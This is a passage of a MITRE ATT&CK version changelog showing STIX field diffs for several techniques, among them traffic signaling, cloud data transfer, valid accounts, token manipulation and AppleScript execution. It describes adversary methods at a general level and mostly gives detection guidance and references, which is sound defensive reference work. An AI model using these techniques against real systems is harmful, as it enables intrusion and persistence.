>evices, adversaries may use crafted packets to enable [Netwo>evices, adversaries may use crafted packets to enable [Netwo
>rk Device Authentication](https://attack.mitre.org/technique>rk Device Authentication](https://attack.mitre.org/technique
>s/T1556/004) for standard services offered by the device suc>s/T1556/004) for standard services offered by the device suc
>h as telnet.  Such signaling may also be used to open a clos>h as telnet.  Such signaling may also be used to open a clos
>ed service port such as telnet, or to trigger module modific>ed service port such as telnet, or to trigger module modific
>ation of malware implants on the device, adding, removing, o>ation of malware implants on the device, adding, removing, o
>r changing malicious capabilities.(Citation: Cisco Synful Kn>r changing malicious capabilities.  Adversaries may use craf
>ock Evolution) (Citation: FireEye - Synful Knock) (Citation:>ted packets to attempt to connect to one or more (open or cl
> Cisco Blog Legacy Device Attacks)  To enable this traffic s>osed) ports, but may also attempt to connect to a router int
>ignaling on embedded devices, adversaries must first achieve>erface, broadcast, and network address IP on the same port i
> and leverage [Patch System Image](https://attack.mitre.org/>n order to achieve their goals and objectives.(Citation: Cis
>techniques/T1601/001) due to the monolithic nature of the ar>co Synful Knock Evolution)(Citation: Mandiant - Synful Knock
>chitecture.  Adversaries may also use the Wake-on-LAN featur>)(Citation: Cisco Blog Legacy Device Attacks)  To enable thi
>e to turn on powered off systems. Wake-on-LAN is a hardware >s traffic signaling on embedded devices, adversaries must fi
>feature that allows a powered down system to be powered on, >rst achieve and leverage [Patch System Image](https://attack
>or woken up, by sending a magic packet to it. Once the syste>.mitre.org/techniques/T1601/001) due to the monolithic natur
>m is powered on, it may become a target for lateral movement>e of the architecture.  Adversaries may also use the Wake-on
>.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Mag>-LAN feature to turn on powered off systems. Wake-on-LAN is 
>ic Packet)>a hardware feature that allows a powered down system to be p
 >owered on, or woken up, by sending a magic packet to it. Onc
 >e the system is powered on, it may become a target for later
 >al movement.(Citation: Bleeping Computer - Ryuk WoL)(Citatio
 >n: AMD Magic Packet)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-02-17 14:23:49.495000+00:002022-10-19 23:08:40.603000+00:00
descriptionAdversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
external_references[1]['source_name']Hartrell cd00r 2002Bleeping Computer - Ryuk WoL
external_references[1]['description']Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.
external_references[1]['url']https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
external_references[2]['source_name']Cisco Synful Knock EvolutionAMD Magic Packet
external_references[2]['description']Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.
external_references[2]['url']https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-deviceshttps://www.amd.com/system/files/TechDocs/20213.pdf
external_references[3]['source_name']FireEye - Synful KnockMandiant - Synful Knock
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.htmlhttps://www.mandiant.com/resources/synful-knock-acis
external_references[4]['source_name']Cisco Blog Legacy Device AttacksCisco Synful Knock Evolution
external_references[4]['description']Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.
external_references[4]['url']https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
external_references[5]['source_name']Bleeping Computer - Ryuk WoLHartrell cd00r 2002
external_references[5]['description']Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.
external_references[5]['url']https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
external_references[6]['source_name']AMD Magic PacketCisco Blog Legacy Device Attacks
external_references[6]['description']AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[6]['url']https://www.amd.com/system/files/TechDocs/20213.pdfhttps://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentProcess: Process Creation
x_mitre_version2.22.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsTony Lee
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1537] Transfer Data to Cloud Account

Current version: 1.3

Version changed from: 1.1 → 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.280000+00:002022-06-16 19:21:04.897000+00:00
external_references[1]['source_name']DOJ GRU Indictment Jul 2018AWS EBS Snapshot Sharing
external_references[1]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.
external_references[1]['url']https://www.justice.gov/file/1080281/downloadhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html
x_mitre_data_sources[1]Snapshot: Snapshot ModificationSnapshot: Snapshot Metadata
x_mitre_data_sources[3]Cloud Storage: Cloud Storage CreationCloud Storage: Cloud Storage Metadata
x_mitre_detectionMonitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. In AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a "Get Snapshot SAS URL" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature)
x_mitre_version1.11.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Azure Shared Access Signature', 'description': 'Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature'}
external_references{'source_name': 'Azure Blob Snapshots', 'description': 'Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview'}
external_references{'source_name': 'DOJ GRU Indictment Jul 2018', 'description': 'Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.', 'url': 'https://www.justice.gov/file/1080281/download'}
x_mitre_contributorsDarin Smith, Cisco
x_mitre_contributorsExtraHop
x_mitre_data_sourcesCloud Storage: Cloud Storage Creation
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesSnapshot: Snapshot Modification

[T1078] Valid Accounts

Current version: 2.5

Version changed from: 2.3 → 2.5


Old Description
New Description
t1Adversaries may obtain and abuse credentials of existing acct1Adversaries may obtain and abuse credentials of existing acc
>ounts as a means of gaining Initial Access, Persistence, Pri>ounts as a means of gaining Initial Access, Persistence, Pri
>vilege Escalation, or Defense Evasion. Compromised credentia>vilege Escalation, or Defense Evasion. Compromised credentia
>ls may be used to bypass access controls placed on various r>ls may be used to bypass access controls placed on various r
>esources on systems within the network and may even be used >esources on systems within the network and may even be used 
>for persistent access to remote systems and externally avail>for persistent access to remote systems and externally avail
>able services, such as VPNs, Outlook Web Access and remote d>able services, such as VPNs, Outlook Web Access, network dev
>esktop. Compromised credentials may also grant an adversary >ices, and remote desktop.(Citation: volexity_0day_sophos_FW)
>increased privilege to specific systems or access to restric> Compromised credentials may also grant an adversary increas
>ted areas of the network. Adversaries may choose not to use >ed privilege to specific systems or access to restricted are
>malware or tools in conjunction with the legitimate access t>as of the network. Adversaries may choose not to use malware
>hose credentials provide to make it harder to detect their p> or tools in conjunction with the legitimate access those cr
>resence.  The overlap of permissions for local, domain, and >edentials provide to make it harder to detect their presence
>cloud accounts across a network of systems is of concern bec>.  In some cases, adversaries may abuse inactive accounts: f
>ause the adversary may be able to pivot across accounts and >or example, those belonging to individuals who are no longer
>systems to reach a high level of access (i.e., domain or ent> part of an organization. Using these accounts may allow the
>erprise administrator) to bypass access controls set within > adversary to evade detection, as the original account user 
>the enterprise. (Citation: TechNet Credential Theft)>will not be present to identify any anomalous activity takin
 >g place on their account.(Citation: CISA MFA PrintNightmare)
 >  The overlap of permissions for local, domain, and cloud ac
 >counts across a network of systems is of concern because the
 > adversary may be able to pivot across accounts and systems 
 >to reach a high level of access (i.e., domain or enterprise 
 >administrator) to bypass access controls set within the ente
 >rprise.(Citation: TechNet Credential Theft)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAdair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-560
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 03:29:48.018000+00:002022-10-19 19:57:39.849000+00:00
descriptionAdversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare) The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
external_references[1]['source_name']capecvolexity_0day_sophos_FW
external_references[1]['url']https://capec.mitre.org/data/definitions/560.htmlhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
external_references[2]['source_name']TechNet Credential TheftCISA MFA PrintNightmare
external_references[2]['description']Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.
external_references[2]['url']https://technet.microsoft.com/en-us/library/dn535501.aspxhttps://www.cisa.gov/uscert/ncas/alerts/aa22-074a
external_references[3]['source_name']TechNet Audit PolicyTechNet Credential Theft
external_references[3]['description']Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.
external_references[3]['url']https://technet.microsoft.com/en-us/library/dn487457.aspxhttps://technet.microsoft.com/en-us/library/dn535501.aspx
x_mitre_defense_bypassed[1]Host intrusion prevention systemsAnti-virus
x_mitre_defense_bypassed[2]Network intrusion detection systemHost Intrusion Prevention Systems
x_mitre_defense_bypassed[3]Application controlNetwork Intrusion Detection System
x_mitre_defense_bypassed[4]System access controlsApplication Control
x_mitre_defense_bypassed[5]Anti-virusSystem Access Controls
x_mitre_detectionConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
x_mitre_version2.32.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'}
x_mitre_contributorsSyed Ummar Farooqh, McAfee
x_mitre_contributorsPrasad Somasamudram, McAfee
x_mitre_contributorsSekhar Sarukkai, McAfee
x_mitre_data_sourcesLogon Session: Logon Session Metadata
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata
Metadata-only Changes

[T1557.002] Adversary-in-the-Middle: ARP Cache Poisoning

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-28 01:04:39.141000+00:002022-07-22 18:37:22.176000+00:00
external_references[1]['source_name']RFC826 ARPCylance Cleaver
external_references[1]['description']Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.
external_references[1]['url']https://tools.ietf.org/html/rfc826https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
external_references[2]['source_name']Sans ARP Spoofing Aug 2003RFC826 ARP
external_references[2]['description']Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.
external_references[2]['url']https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411https://tools.ietf.org/html/rfc826
external_references[3]['source_name']Cylance CleaverSans ARP Spoofing Aug 2003
external_references[3]['description']Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.
external_references[3]['url']https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdfhttps://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411

[T1548] Abuse Elevation Control Mechanism

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-22 21:36:52.825000+00:002022-03-21 19:01:25.043000+00:00
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: OS API Execution
x_mitre_data_sources[3]Command: Command ExecutionFile: File Metadata
x_mitre_data_sources[4]File: File MetadataFile: File Modification
x_mitre_data_sources[5]File: File ModificationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]Process: OS API ExecutionCommand: Command Execution

[T1134] Access Token Manipulation

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAtkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.
external_referencesCAPEC-633
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-633
external_referencesAtkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:51:49.334000+00:002022-05-03 02:14:43.557000+00:00
external_references[1]['source_name']capecBlackHat Atkinson Winchester Token Manipulation
external_references[1]['url']https://capec.mitre.org/data/definitions/633.htmlhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
external_references[2]['source_name']Pentestlab Token ManipulationMicrosoft Command-line Logging
external_references[2]['description']netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.
external_references[2]['url']https://pentestlab.blog/2017/04/03/token-manipulation/https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
external_references[3]['source_name']Microsoft Command-line LoggingMicrosoft LogonUser
external_references[3]['description']Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
external_references[3]['url']https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditinghttps://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx
external_references[4]['source_name']Microsoft LogonUserMicrosoft DuplicateTokenEx
external_references[4]['url']https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspxhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx
external_references[5]['source_name']Microsoft DuplicateTokenExMicrosoft ImpersonateLoggedOnUser
external_references[5]['url']https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspxhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
external_references[6]['source_name']Microsoft ImpersonateLoggedOnUserPentestlab Token Manipulation
external_references[6]['description']Microsoft TechNet. (n.d.). Retrieved April 25, 2017.netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.
external_references[6]['url']https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspxhttps://pentestlab.blog/2017/04/03/token-manipulation/
external_references[7]['source_name']BlackHat Atkinson Winchester Token Manipulationcapec
external_references[7]['url']https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdfhttps://capec.mitre.org/data/definitions/633.html
x_mitre_data_sources[0]Process: Process CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[1]Process: Process MetadataCommand: Command Execution
x_mitre_data_sources[2]Process: OS API ExecutionUser Account: User Account Metadata
x_mitre_data_sources[3]User Account: User Account MetadataProcess: OS API Execution
x_mitre_data_sources[4]Active Directory: Active Directory Object ModificationProcess: Process Metadata
x_mitre_data_sources[5]Command: Command ExecutionProcess: Process Creation
x_mitre_defense_bypassed[1]System access controlsHeuristic Detection
x_mitre_defense_bypassed[2]File system access controlsSystem Access Controls
x_mitre_defense_bypassed[3]Heuristic DetectionHost Forensic Analysis
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedHost forensic analysis

[T1595] Active Scanning

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:20:09.600000+00:002022-03-08 20:58:13.661000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow

[T1059.002] Command and Scripting Interpreter: AppleScript

Current version: 1.1


Old Description
New Description
t1Adversaries may abuse AppleScript for execution. AppleScriptt1Adversaries may abuse AppleScript for execution. AppleScript
> is a macOS scripting language designed to control applicati> is a macOS scripting language designed to control applicati
>ons and parts of the OS via inter-application messages calle>ons and parts of the OS via inter-application messages calle
>d AppleEvents.(Citation: Apple AppleScript) These AppleEvent>d AppleEvents.(Citation: Apple AppleScript) These AppleEvent
> messages can be sent independently or easily scripted with > messages can be sent independently or easily scripted with 
>AppleScript. These events can locate open windows, send keys>AppleScript. These events can locate open windows, send keys
>trokes, and interact with almost any open application locall>trokes, and interact with almost any open application locall
>y or remotely.  Scripts can be run from the command-line via>y or remotely.  Scripts can be run from the command-line via
> <code>osascript /path/to/script</code> or <code>osascript -> <code>osascript /path/to/script</code> or <code>osascript -
>e "script here"</code>. Aside from the command line, scripts>e "script here"</code>. Aside from the command line, scripts
> can be executed in numerous ways including Mail rules, Cale> can be executed in numerous ways including Mail rules, Cale
>ndar.app alarms, and Automator workflows. AppleScripts can a>ndar.app alarms, and Automator workflows. AppleScripts can a
>lso be executed as plain text shell scripts by adding <code>>lso be executed as plain text shell scripts by adding <code>
>#!/usr/bin/osascript</code> to the start of the script file.>#!/usr/bin/osascript</code> to the start of the script file.
>(Citation: SentinelOne AppleScript)  AppleScripts do not nee>(Citation: SentinelOne AppleScript)  AppleScripts do not nee
>d to call <code>osascript</code> to execute, however. They m>d to call <code>osascript</code> to execute. Howeverthey m
>ay be executed from within mach-O binaries by using the macO>ay be executed from within mach-O binaries by using the macO
>S [Native API](https://attack.mitre.org/techniques/T1106)s <>S [Native API](https://attack.mitre.org/techniques/T1106)s <
>code>NSAppleScript</code> or <code>OSAScript</code>, both of>code>NSAppleScript</code> or <code>OSAScript</code>, both of
> which execute code independent of the <code>/usr/bin/osascr> which execute code independent of the <code>/usr/bin/osascr
>ipt</code> command line utility.  Adversaries may abuse Appl>ipt</code> command line utility.  Adversaries may abuse Appl
>eScript to execute various behaviors, such as interacting wi>eScript to execute various behaviors, such as interacting wi
>th an open SSH connection, moving to remote machines, and ev>th an open SSH connection, moving to remote machines, and ev
>en presenting users with fake dialog boxes. These events can>en presenting users with fake dialog boxes. These events can
>not start applications remotely (they can start them locally>not start applications remotely (they can start them locally
>), but they can interact with applications if they're alread>), but they can interact with applications if they're alread
>y running remotely. On macOS 10.10 Yosemite and higher, Appl>y running remotely. On macOS 10.10 Yosemite and higher, Appl
>eScript has the ability to execute [Native API](https://atta>eScript has the ability to execute [Native API](https://atta
>ck.mitre.org/techniques/T1106)s, which otherwise would requi>ck.mitre.org/techniques/T1106)s, which otherwise would requi
>re compilation and execution in a mach-O binary file format.>re compilation and execution in a mach-O binary file format.
>(Citation: SentinelOne macOS Red Team). Since this is a scri>(Citation: SentinelOne macOS Red Team) Since this is a scrip
>pting language, it can be used to launch more common techniq>ting language, it can be used to launch more common techniqu
>ues as well such as a reverse shell via [Python](https://att>es as well such as a reverse shell via [Python](https://atta
>ack.mitre.org/techniques/T1059/006).(Citation: Macro Malware>ck.mitre.org/techniques/T1059/006).(Citation: Macro Malware 
> Targets Macs)>Targets Macs)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-08-03 21:40:51.878000+00:002022-10-19 15:37:28.071000+00:00
